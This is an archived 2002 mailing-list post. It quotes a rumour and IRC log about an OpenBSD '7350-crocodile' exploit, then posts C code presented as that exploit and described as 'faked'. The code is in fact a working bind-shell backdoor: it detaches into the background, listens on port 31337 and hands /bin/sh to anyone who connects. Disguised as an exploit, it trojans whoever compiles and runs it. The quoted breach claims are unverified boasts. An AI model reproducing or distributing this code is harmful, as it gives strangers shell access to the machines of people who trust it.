On Mon, 17 Jun 2002 17:24:03 +0200, Alex de Joode wrote:
>Any comments ?
>
>http://online.securityfocus.com/archive/82/277224/2002-06-14/2002-06-

>20/0
>
><-- START -->
>
>Deer readers,
>
>Few days ago, while i was at the #darknet, i saw three ScRiPtKidIeZ
>(within the rest of them) talking about the 7350-crocodile.c,
>7350-obsdftpd.c and the 7350-pf.c exploit code by team
>teso made with support of GOBBLES Security, who gave them
>the advisories.
>
>The good news:
>
>the exploits aint that much spreaded and they've been kept on the
>underground for about 1month. This ain't really a good new, but it
>is better than the ones that follow.
>
>The bad news:
>
>- openbsd ftp/cvs have been compromised and backdoored by the
>kidies,
>that hang mostly on #!hack.the.turkey at efnet.
>- the technique is new and very obscure, the three exploits abuse em
>and is applicable only on *BSD flavors (afaik).
>
>
>
>the a really short part of the logs show this:
>
><m0rgan> ./a.out
><m0rgan> 7350-crocodile - x86/OpenBSD apache/telnetd/sshd
>*** pr0ix (pr0ixdef-con.org) has joined #darknet
><m0rgan> by lorian and scut / TESO
><m0rgan>
><m0rgan> ./7350-crocodile [options] [host] [port] [misc-option]
><m0rgan>
><m0rgan> -d <daemon> (1= apache, 2= telnetd, 3= sshd)
><m0rgan> -b bruteforce
><m0rgan> -c check only
><m0rgan> -s <0xaddr> start address
><m0rgan> -S shellcode (? to show the list)
><pr0ix> wtf?
><m0rgan>
><m0rgan> greetz: synnergy, GOBBLES Security, ElectronicSoulz,
>shiftee,
>bnuts, skyper.
><m0rgan> sidenote: nasa.gov was really easy ;>
><m0rgan> muahah fear.
><xxx> could you send me that?
>*** pr0ix sets mode: +b xxx!*200.*
>*** xxx was kicked by pr0ix (0day-lurker)
>
>keep an eye open at your logs, as they said the exploit makes a
>lot of noise on the system and "private" logs and thus it is easy
>to spot, put your ids on.
>
><-- END -->
>
There you have it. Famous l33t hyper-turbo 7350-crocodile exploit.
Have phun. LOL. Btw its faked
/*
 * Hey! krocodile exploit watever
 * just jave fun :)
 */

#define PORT 31337
#include <stdio.h>
#include <signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;

int main ()
{
    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (soc_des == -1)
        exit(-1);
    bzero((char *) &serv_addr, sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    serv_addr.sin_port = htons(PORT);
    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr,
sizeof(serv_addr));
    if (soc_rc != 0)
        exit(-1);
    if (fork() != 0)
        exit(0);
    setpgrp();
    signal(SIGHUP, SIG_IGN);
    if (fork() != 0)
        exit(0);
    soc_rc = listen(soc_des, 5);
    if (soc_rc != 0)
        exit(0);
    while (1) {
        soc_len = sizeof(client_addr);
        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,
&soc_len);
        if (soc_cli < 0)
            exit(0);
        cli_pid = getpid();
        server_pid = fork();
        if (server_pid != 0) {
            dup2(soc_cli,0);
            dup2(soc_cli,1);
            dup2(soc_cli,2);
            execl("/bin/sh","sh",(char *)0);
            close(soc_cli);
            exit(0);
        }
    close(soc_cli);
    }
}

-- 
Adam Naguszewski, adminbmtmc.gda.pl on 06-18-2002

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]